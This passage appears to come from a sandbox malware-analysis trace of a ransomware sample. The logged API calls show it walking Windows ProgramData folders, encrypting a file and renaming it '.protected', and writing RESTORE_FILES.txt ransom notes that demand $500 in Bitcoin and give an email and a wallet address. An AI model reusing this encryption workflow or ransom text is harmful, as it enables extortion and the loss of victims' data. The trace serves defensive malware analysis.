lpString2="$Recycle.bin") returned 1 [0072.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\.") returned 55 [0072.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.050] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\..") returned 56 [0072.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.051] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="Windows") returned -1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="Program Files") returned -1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="Program Files (x86)") returned -1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="$Recycle.bin") returned 1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="System Volume Information") returned -1 [0072.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrIW (lpFirst="MPLog-07132009-221054.log", lpSrch=".protected") returned 0x0 [0072.051] lstrcmpW (lpString1="MPLog-07132009-221054.log", lpString2="RESTORE_FILES.txt") returned -1 [0072.051] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".txt") returned 0x0 [0072.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".rar") returned 0x0 [0072.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".zip") returned 0x0 [0072.052] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0072.071] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.071] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0072.072] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.072] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0072.076] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0072.076] CloseHandle (hObject=0xd4) returned 1 [0072.076] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.protected") returned 89 [0072.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.protected")) returned 1 [0072.077] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.077] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.077] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt") returned 71 [0072.077] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.077] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.077] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.078] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.078] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.078] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.078] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.078] CloseHandle (hObject=0xb4) returned 1 [0072.078] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.078] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0072.078] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\RESTORE_FILES.txt") returned 63 [0072.078] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.079] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.079] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.080] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.080] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.080] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.080] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.080] CloseHandle (hObject=0xa4) returned 1 [0072.080] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="Windows") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files (x86)") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="$Recycle.bin") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="System Volume Information") returned 1 [0072.080] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned 39 [0072.080] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0072.080] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*") returned 41 [0072.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0072.081] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.081] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.081] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.081] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.081] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\.") returned 41 [0072.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.081] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.081] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.081] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.081] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.081] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.081] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\..") returned 42 [0072.081] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.081] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.081] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="Windows") returned -1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="Program Files") returned -1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="Program Files (x86)") returned -1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="$Recycle.bin") returned 1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="System Volume Information") returned -1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned 45 [0072.081] lstrcmpW (lpString1="MSFax", lpString2=".") returned 1 [0072.081] lstrcmpW (lpString1="MSFax", lpString2="..") returned 1 [0072.081] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*") returned 47 [0072.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.084] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.084] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.084] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.084] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.084] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\.") returned 47 [0072.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.084] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\..") returned 48 [0072.085] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.085] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.085] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 57 [0072.085] lstrcmpW (lpString1="ActivityLog", lpString2=".") returned 1 [0072.085] lstrcmpW (lpString1="ActivityLog", lpString2="..") returned 1 [0072.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned 59 [0072.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.085] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\.") returned 59 [0072.085] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.085] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\..") returned 60 [0072.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.086] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.086] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.086] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt") returned 75 [0072.086] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\activitylog\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.086] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.087] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.087] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.087] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.087] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.087] CloseHandle (hObject=0xd4) returned 1 [0072.087] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="Windows") returned -1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files") returned -1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files (x86)") returned -1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="$Recycle.bin") returned 1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="System Volume Information") returned -1 [0072.087] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0072.087] lstrcmpW (lpString1="Common Coverpages", lpString2=".") returned 1 [0072.087] lstrcmpW (lpString1="Common Coverpages", lpString2="..") returned 1 [0072.087] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned 65 [0072.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 